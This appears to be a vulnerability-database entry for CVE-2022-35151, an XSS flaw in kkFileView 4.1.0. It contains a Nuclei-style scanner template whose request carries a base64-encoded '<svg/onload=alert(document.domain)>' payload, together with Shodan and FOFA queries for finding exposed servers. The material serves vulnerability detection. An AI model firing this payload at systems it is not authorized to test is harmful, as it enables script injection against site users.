CVE-2022-35151: kkFileView 4.1.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: kkFileView | POC: 已公开

漏洞描述

kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.

PoC代码[已公开]

id: CVE-2022-35151

info:
  name: kkFileView 4.1.0 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor.
  reference:
    - https://github.com/kekingcn/kkFileView/issues/366
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35151
    - https://github.com/StarCrossPortal/scalpel
    - https://github.com/anonymous364872/Rapier_Tool
    - https://github.com/youcans896768/APIV_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-35151
    cwe-id: CWE-79
    epss-score: 0.04628
    epss-percentile: 0.88858
    cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: keking
    product: kkfileview
    shodan-query:
      - http.html:"kkFileView"
      - http.html:"kkfileview"
    fofa-query:
      - body="kkfileview"
      - app="kkfileview"
  tags: cve,cve2022,xss,kkfileview,keking

http:
  - raw:
      - |
        GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<svg/onload=alert(document.domain)>'
          - '图片预览'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200338c5345c9b2d2c4d55dbbc914dc0866c562b5c8ce21b4e239fb29f3b71b1e0022100b960410f1ff6d8c4cc18bb5b8c2c63f079bac748b4fda0a117d802645f1d4723:922c64590222798bb761d5b6d8e72950

相关漏洞推荐